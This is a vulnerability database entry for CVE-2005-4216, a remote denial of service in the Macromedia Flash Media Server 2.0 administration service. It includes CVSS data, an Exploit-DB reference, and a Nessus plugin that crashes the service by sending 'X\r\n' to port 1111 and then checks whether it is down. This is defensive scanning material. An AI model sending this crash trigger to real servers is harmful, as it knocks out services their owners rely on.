Vulnerabilities > CVE-2005-4216 - Remote Denial of Service vulnerability in Macromedia Flash Media Server 2.0/2.0R1145

047910
CVSS 7.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
COMPLETE
network
low complexity
macromedia
nessus
exploit available

Summary

The Administration Service (FMSAdmin.exe) in Macromedia Flash Media Server 2.0 r1145 allows remote attackers to cause a denial of service (application crash) via a malformed request with a single character to port 1111.

Vulnerable Configurations

Part Description Count
Application
Macromedia
5

Exploit-Db

descriptionMacromedia Flash Media Server 2 Remote Denial of Service Exploit. CVE-2005-4216. Dos exploit for windows platform
idEDB-ID:1371
last seen2016-01-31
modified2005-12-14
published2005-12-14
reporterKozan
sourcehttps://www.exploit-db.com/download/1371/
titleMacromedia Flash Media Server 2 - Remote Denial of Service Exploit

Nessus

NASL familyDenial of Service
NASL idFLASH_MEDIASERVER_ADMIN_DOS.NASL
descriptionThe remote host appears to be using Flash Media Server. The version of Flash Media Server installed on the remote host is affected by a flaw in its administration server that causes it to crash if it receives a single character. The administration server is used to remotely administer Flash Media Server, and this flaw can be used by an attacker to disable access to this service.
last seen2020-06-01
modified2020-06-02
plugin id20302
published2005-12-14
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/20302
titleMacromedia Flash Media Server Administration Service Crafted Packet Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(20302);
  script_version("1.20");

  script_cve_id("CVE-2005-4216");
  script_bugtraq_id(15822);
 
  script_name(english:"Macromedia Flash Media Server Administration Service Crafted Packet Remote DoS");
  script_summary(english:"Checks for denial of service vulnerability in Flash Media Server Administration Service");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote service is prone to a remote denial of service attack." );
 script_set_attribute(attribute:"description", value:
"The remote host appears to be using Flash Media Server.

The version of Flash Media Server installed on the remote host
is affected by a flaw in its administration server that causes it to crash
if it receives a single character. The administration server 
is used to remotely administer Flash Media Server, and this flaw
can be used by an attacker to disable access to this service." );
 script_set_attribute(attribute:"solution", value:
"Limit access to this port to trusted users." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/14");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/12/07");
 script_cvs_date("Date: 2018/07/11 17:09:24");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");
 
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 1111);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:1111);

# If it looks like FMS Administration Server...
banner = get_http_banner(port:port);
if ("Server: FlashCom/" >!< banner) exit(0, "Not a FlashCom web server");

# nb: the advisory is wrong about a single character;
#     it ignores the effect of the line endings.
w = http_send_recv_buf(port:port, data: 'X\r\n');

# There's a problem if the server's down now.
if (http_is_dead(port:port)) security_hole(port);